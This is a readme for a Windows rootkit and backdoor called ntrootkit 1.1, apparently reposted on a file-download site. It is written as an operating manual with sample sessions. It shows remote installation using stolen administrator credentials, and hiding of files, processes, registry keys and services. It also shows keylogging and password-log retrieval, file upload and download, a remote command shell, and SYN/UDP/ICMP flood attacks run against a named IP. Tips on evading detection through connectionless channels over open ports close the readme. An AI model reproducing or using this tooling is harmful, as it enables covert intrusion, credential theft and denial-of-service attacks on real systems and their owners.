yyt_hac's ntrootkit 1.1 Readme The first thing you should know about this rootkit is that the built-in backdoor can communicate with the client in 4 ways (0:Userdefined,1:Icmp,2:Udp,3:Tcp). these are all connectionless so using a utility like fport.exe will not show a connection since there isnt one. TCP and UDP are the most reliable. Also of importance is that the defautl password is yyt_hac . This can and should be changed but for connecting to the backdoor for the first time it must be used. -Local Installation and Commandline Options C:\WINNT\system32>ntrootkit -h This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com Usage:ntrootkit \\ip -u username -p password ip the computer you want to install ntrootkit on -u [username] admin account on remote computer -p [password] admin password on remote computer Usage:ntrootkit [-v/-m/-u [password]/-i [password]] -v show the ntrootkit version that is installed -u [password] uninstall the ntrootkit -i [password] update the ntrootkit, the new version will be run after reboot -m show the work mode of the ntrootkit -m [workmode] set the workmore of the rootkit (0=sniffer, 1=driver) C:\WINNT>ntrootkit //local install, run without any options This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com Exacting files.....ok Installing service..ok Starting up The Ntrootkit..ok The Ntrootkit is installed and started successfully! C:\WINNT>ntrootkit -m This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com The ntrootkit is using windows 2000 sniffer mode to recv packet //This mode is not very stable, driver is highly reccommended C:\WINNT\>ntrootkit -v ntrootkit -v This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com The Version of Ntrootkit that is installed is 1.1 C:\WINNT\system32>ntrootkit -i [password] //update rootkit ntrootkit -i yyt_hac This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com Please enter you password: Please wait a minute..... Update successfully,the new version very runs after system reboots! -Remote Installation F:\letmein>ntrootkit \\202.38.*.* -u administrator -p 123456 This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com Connecting to remote computer...ok Exacting files.....ok Installing service..ok Starting up The Ntrootkit..ok Disconnecting...ok The Ntrootkit is installed and started successfully! -Backdoor L:\c\rootkit\44\RTCLIENT\Release>rtclient It is yyt_hac's ntrootkit client 1.1 Welcome to http://www.yythac.com usage:rtclient destip [-p password] [-t proto] [-o port] [-y icmp_type] [-d icmp_code] [-m MTU] [-c Command] destip-------------The computer you want to connect password-----------The ntrootkit's password proto--------------The proto that ntrootkit will use(0:userdefined,1:icmp,2:udp,3:tcp) port---------------The dest udp or tcp port which send packet to (default is 445) MTU----------------The MAX packet size the ntrootkit will use to send packet(if not provided ,the program will get it automatically ) icmp_type----------The icmp packet type which send to server,default is ICMP_ECHO REPLY icmp_code----------The icmp packet code which send to server,default is 0 Command------------The command which you want the server to do The DDos command usage:DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount] DDos_Destip--------The computer you want to DDos DDos_Destport------The Destport you want to DDos (default is 445) DDos_type----------The DDos type you want to use (0:ping flood,1:udp flood,2:synflood,3:mstream flood,default is 0) DDos_seconds-------The seconds you want to DDos the dest (default is 150s) DDos_ProcCount-----The process count which the server use to ddos (default is 10) //the only required commandline options are destip and password, others have default values L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3 It is yyt_hac's ntrootkit client 1.0 Welcome to http://www.yythac.com Getting ip address of the computer... 1. 1.1.1.89 2. 1.1.1.200 Please Select the number of the ip address you want to use to send and recv packet:1 Time out,Please make sure the target is up and try again //if the default port of 445 does not work, try another with the -o option L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3 -o 139 It is yyt_hac's ntrootkit client 1.1 Welcome to http://www.yythac.com Getting ip address of the computer... 1. 1.1.1.89 2. 1.1.1.200 Please Select the number of the ip address you want to use to send and recv packet:1 Welcome to yyt_hac's ntrootkit Server 1.0,use '?' command to get command list CMD>? ********yyt_hac's ntrootkit Server Command List******** ?-------------------------------Show this list HideFileDir [FileName or DIR]----------------------Hide the file or directory HideProcId [pid]----------------Hide process with the id HideProcName [procname]---------Hide process with the process name HideKey [KeyName]---------------Hide a registry key HideValue [ValueName]-----------Hide a registry value HideUser [UserName]-------------Hide a User HideServ [ServiceName]----------Hide a Service ShowFileDir FileName or DIR-----UnHide the file or directory that been hidden before ShowProcId pid------------------UnHide the process that been hidden before with the id ShowProcName procname-----------UnHide the process that been hidden before with the process name ShowKey KeyName-----------------UnHide the registry key ShowValue ValueName-------------UnHide the registry value ShowUser UserName---------------UnHide the user that been hidden before ShowServ ServiceName------------UnHide the service that been hidden before Get RemoteFilePath [LocalFilePath]----Get the remote file to local computer Put LocalFilePath [RemoteFilePath]----Put the local file to remote computer KeyLogOn------------------------------Start key log KeyLogOff-----------------------------Stop key log DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount]---DDos the destip SDDOS---------------------------------Stop DDos GetPwd [LocalFilePath]----------------Get the ntrootkit keylog password file to local computer DelPwd--------------------------------Del the ntrootkit keylog password file Ps------------------------------------Show all processes on remote machine Kill pid------------------------------Kill the process with the id or name RTVer---------------------------------Show Ntrootkit server version and author info SetPass [NewPassword]-----------------Change or show the connection password Reboot--------------------------------Reboot the targer computer OpenShell-----------------------------Open a command shell Exit----------------------------------Exit the shell or rootkit //notes HideKey,HideServ,etc Call any Hide* command without a parameter to see a list of currently hidden items HideUser [UserName]-------------------Not implemented yet HideServ [ServiceName]----------------Hide a service by service name NOT display name CMD>ps //list processes, including hidden ProcessID ProcessName 0 [System Process] 8 System 176 smss.exe 200 csrss.exe 224 WINLOGON.EXE 252 services.exe 2*** LSASS.EXE 452 svchost.exe 508 spoolsv.exe 536 NETDDE.EXE 13*** ntfrs.exe 1392 NTservice.exe 1404 NTweb.exe 1412 CCP.exe 1900 termsrv.exe 1952 winmgmt.exe 1968 winvnc.exe 1992 dns.exe 2032 inetinfo.exe 2076 ismserv.exe 2512 explorer.exe 2720 internat.exe 2728 sqlmangr.exe 2652 plog.exe 2624 SysArchive.exe 2752 svchost.exe 3160 DWRCS.EXE 11544 SpntSvc.exe 23028 CCProxy.exe 27096 mshta.exe 27***0 PSEXESVC.EXE 28008 cmd.exe 27872 rtkit.exe CMD>kill 27096 process is been killed ! CMD>rtver The ntrootkit version is 1.1, welcome to http://www.yythac.com CMD>hideprocid //list hidden processes The Hide ProcId: CMD>keylogon //start keylogger Key log Start successfully CMD>ddos 202.202.23.3.14 139 2 30 //DOS 202.23.3.14 with a syn flood on port 139 for 30sec DDos dip:202.23.3.14,DDos dport:139,DDos type:2,DDos seconds:30,DDos process count:10, DDos started successfully! CMD>ddos 202.23.3.14 139 2 30 //can only do one dos at at a time DDos already started CMD>sddos //stop running dos attack Stop DDos sucessfully! CMD>openshell //windows commandshell Microsoft Windows 2000 [版本 5.00.2195] (C) Copyright 1***5-2000 Microsoft Corp. C:\WINNT\system32>hideprocid //1500 is the commmandshell procid,it will add to hidden list automatically,and will be delete after exit The Hide ProcId: 1500 C:\WINNT\system32>cd \ cd \ C:\>dir/w dir/w 磁碟區 C 中的磁碟沒有標籤。 磁碟區序號: B472-5102 目錄: C:\ 89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] [FASROOT] [ie] [Inetpub] logfile.txt MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] 新建 文本文?.txt 19 個檔案 3,586,720 位元組 10 個目錄 1,213,169,6*** 位元組可用 C:\>hidefiledir *logfile.txt //hide the file the ends with or is called logfile.txt HideFileDir:successfully C:\>dir/w dir/w 磁碟區 C 中的磁碟沒有標籤。 磁碟區序號: B472-5102 目錄: C:\ 89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] [FASROOT] [ie] [Inetpub] MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] 新建 文本文?.txt 18 個檔案 3,586,582 位元組 10 個目錄 1,213,169,6*** 位元組可用 C:\>hidefiledir //file was hidden successfully, not in list above The Hide File or Dir: *LOGFILE.TXT C:\>showfiledir *logfile.txt //unhide *logfile.txt ShowFileDir:successfully C:\>showfiledir *logfile.txt ShowFileDir:already hidden or not found C:\>dir/w //there is is again dir/w 磁碟區 C 中的磁碟沒有標籤。 磁碟區序號: B472-5102 目錄: C:\ 89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] [FASROOT] [ie] [Inetpub] logfile.txt MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] 新建 文本文?.txt 19 個檔案 3,586,720 位元組 10 個目錄 1,213,169,6*** 位元組可用 C:\>get tsc.zip //file must exist Can't open file C:\>get c:\tsc.zip d:\zips\tsc.zip //download c:\tsc.zip to d:\zips\tsc.zip ................................................................................ ................................................................................ ..................Get file sucssesfully! C:\>put c:\logfile.txt c:\f.txt //upload c:\logfile.txt to c:\f.txt .....Put file successfully! C:\>dir/w dir/w 磁碟區 C 中的磁碟沒有標籤。 磁碟區序號: B472-5102 目錄: C:\ 89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] f.txt [FASROOT] [ie] [Inetpub] logfile.txt MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] 新建 文本文?.txt 20 個檔案 3,593,221 位元組 10 個目錄 1,213,161,472 位元組可用 C:\>del f.txt del f.txt C:\>exit //exit shell, back to backdoor main CMD>exit //exit backdoor exit successfully bye bye F:\letmein> 1. If you and the target machine do not have an external address then you can only use tcp/udp protocol for the backdoor but you may still specifiy a different port. 2. Since the backdoor is connectionless you must piggyback on an existing open port like those below : UDP - 445,137,138,500,4000,53,etc TCP - 445,139,80,21,23,135,53,etc 3. Backdoor client and rootkit on the same machine cannot communicate. Meaning trying to connect to localhost using the client will not work. 4. Machines with valid external ips can use TCP/UDP/ICMP , TCP/UDP are reccommended unless the machine is locked up tight but pings can get through in which case ICMP be the best choice. 5. If you do not exit the backdoor properly, with exit command, then wait a few minutes before reconnecting. 6. If you use the sniffer working mode the backdoor can be unreachable with high network traffic volume, use at your judgement. 7. Do no forget to change the rootkit pasword with the SetPass command, default is yyt_hac. 8. Use corresponding clients and roorkit versions, backwards and forwards compatibility is not guaranteed. -Thank to Joe Warshaw for this english readme Web:http://www.yythac.com Email:webmaster@yythac.com QQ:47090005 icq:272288117

近期下载者：

相关文件：

评论：[我要评论] [举报此文件]

收藏者：